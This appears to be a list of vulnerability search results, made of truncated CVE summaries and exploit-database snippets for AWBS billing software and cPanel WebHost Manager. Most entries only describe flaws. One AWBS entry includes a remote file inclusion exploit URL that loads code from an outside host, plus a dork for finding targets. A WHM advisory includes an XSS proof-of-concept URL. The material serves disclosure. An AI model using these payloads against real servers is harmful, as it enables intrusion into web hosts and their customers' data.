CVE-2008-2903
SQL injection vulnerability in news.php in Advanced Webhost Billing System (AWBS) 2.3.3 through 2.7.1, when magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary SQL commands via the viewnews parameter...
Default configuration
Unspecified vulnerability in Advanced Webhost Billing System (AWBS) before 2.6.0 allows remote authenticated users to obtain configuration data about other dedicated servers via unspecified vectors...
CVE-2007-4112
Multiple SQL injection vulnerabilities in Advanced Webhost Billing System (AWBS) before 2.6.0, when magic_quotes_gpc is disabled, allow remote attackers to execute arbitrary SQL commands via unspecified vectors. NOTE: this can be leveraged for XSS attacks that "bypass AWBS's anti-XSS input validation...
CVE-2007-4113
Unspecified vulnerability in Advanced Webhost Billing System (AWBS) before 2.6.0 allows remote authenticated users to obtain configuration data about other dedicated servers via unspecified vectors...
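Advanced Webhost Billing System Cart2.PHP Remote File Inclusion Vulnerability
Advanced Webhost Billing System is a PHP-based web application. Advanced Webhost Billing System does not properly filter user-supplied input, so a remote attacker can exploit the vulnerability to execute arbitrary commands with web server privileges. The problem is that the 'cart2.php' script does not filter the user-supplied 'workdir' parameter; specifying a file on a remote server as the include parameter can lead to execution of arbitrary commands with web server privileges. Advanced Webhost Billing System AWBS 2.4 No solution is currently available: http://www.awbs.com/...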
Advanced Webhost Billing System (AWBS) 2.4.0 - cart2.php Remote File Inclusion
Advanced Webhost Billing System AWBS 2.4.0 - cart2.php Remote File Inclusion AWBS v2.4.0 Remote file includecart2.php Demo : http://www.awbs.com/demo.php D0rk : İnurl:awbs.php Home Page: Www.SiberAktif.Net Exploit...
Advanced Webhost Billing System (AWBS) 2.4.0 - 'cart2.php' Remote File Inclusion
AWBS v2.4.0 Remote file includecart2.php Demo : http://www.awbs.com/demo.php D0rk : İnurl:awbs.php Home Page: Www.SiberAktif.Net Exploit http://localhost/gpbpath/docs/front-end-demo/cart2.php?workdir=http://sh3ll.com/for.txt? Discovered by : DamaR [email protected] milw0rm.com 2007-04-24...
xss in phpmyadmin >=2.8.0 and < 2.10.0
This xss with xsrf possibility works only when logged in, but since in many places anonymous logins are allowed and many webhost companies offer just 1 or few phpmyadmins for a large number of users, i consider it worth to be published. Theoretically it is possible to obtain and use the cookie an...
Cross site scripting
Cross-site scripting (XSS) vulnerability in scripts/passwdmysql in cPanel WebHost Manager (WHM) 11.0.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the password parameter...
CVE-2007-0854
Remote file inclusion vulnerability in scripts2/objcache in cPanel WebHost Manager (WHM) allows remote attackers to execute arbitrary code via a URL in the obj parameter. NOTE: a third party claims that this issue is not file inclusion because the contents are not parsed, but the attack can be used...
CVE-2006-6548
Multiple cross-site scripting (XSS) vulnerabilities in cPanel WebHost Manager (WHM) 3.1.0 allow remote authenticated users to inject arbitrary web script or HTML via the domain parameter to (1) scripts2/changeemail, (2) scripts2/limitbw, or (3) scripts/rearrangeacct. NOTE: the feature parameter to...
[Aria-Security Team] CentOS 4.2 i686 - WHM X v3.1.0 Cross-Site Scripting
cAria-Security Team Advisory www.Aria-security.Com For English www.Aria-Security.net For Persian Original Advisory: http://www.aria-security.com/forum/showthread.php?t=44 ----------------------------------------------------------- Software: WebHost Manager WHM Tested WHM X v3.1.0 demo.cpanel.net...
aria-whm.txt
cAria-Security Team Advisory Original Advisory: http://www.aria-security.com/forum/showthread.php?t=44 ----------------------------------------------------------- Software: WebHost Manager WHM Tested WHM X v3.1.0 demo.cpanel.net Poc: http://target:2086/scripts2/changeemail?domain=dXSS...
CVE-2006-6198
Multiple cross-site scripting (XSS) vulnerabilities in cPanel WebHost Manager (WHM) 3.1.0 allow remote authenticated users to inject arbitrary web script or HTML via the (1) email parameter to (a) scripts2/dochangeemail, the (2) supporturl parameter to (b) cgi/addonconfigsupport.cgi, the (3) pkg parameter to (c)...
aria-webhost.txt
Aria-Security Team Advisory Original Advisory: http://www.aria-security.com/forum/showthread.php?t=44 ----------------------------------------------------------- Software: WebHost Manager WHM Tested WHM X v3.1.0 demo.cpanel.net Poc:...
cPanel WebHost Manager 3.1 - editzone?domain Cross-Site Scripting
cPanel WebHost Manager 3.1 - editzone?domain Cross-Site Scripting source: https://www.securityfocus.com/bid/21288/info WebHost Manager is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to have...
cPanel WebHost Manager 3.1 - domts2?domain Cross-Site Scripting
cPanel WebHost Manager 3.1 - domts2?domain Cross-Site Scripting source: https://www.securityfocus.com/bid/21288/info WebHost Manager is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to have...
cPanel WebHost Manager 3.1 - park?ndomain Cross-Site Scripting
cPanel WebHost Manager 3.1 - park?ndomain Cross-Site Scripting source: https://www.securityfocus.com/bid/21288/info WebHost Manager is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to have...
cPanel WebHost Manager 3.1 - dofeaturemanager?feature Cross-Site Scripting
cPanel WebHost Manager 3.1 - dofeaturemanager?feature Cross-Site Scripting source: https://www.securityfocus.com/bid/21288/info WebHost Manager is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issue...
cPanel WebHost Manager 3.1 - editpkg?pkg Cross-Site Scripting
cPanel WebHost Manager 3.1 - editpkg?pkg Cross-Site Scripting source: https://www.securityfocus.com/bid/21288/info WebHost Manager is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to have...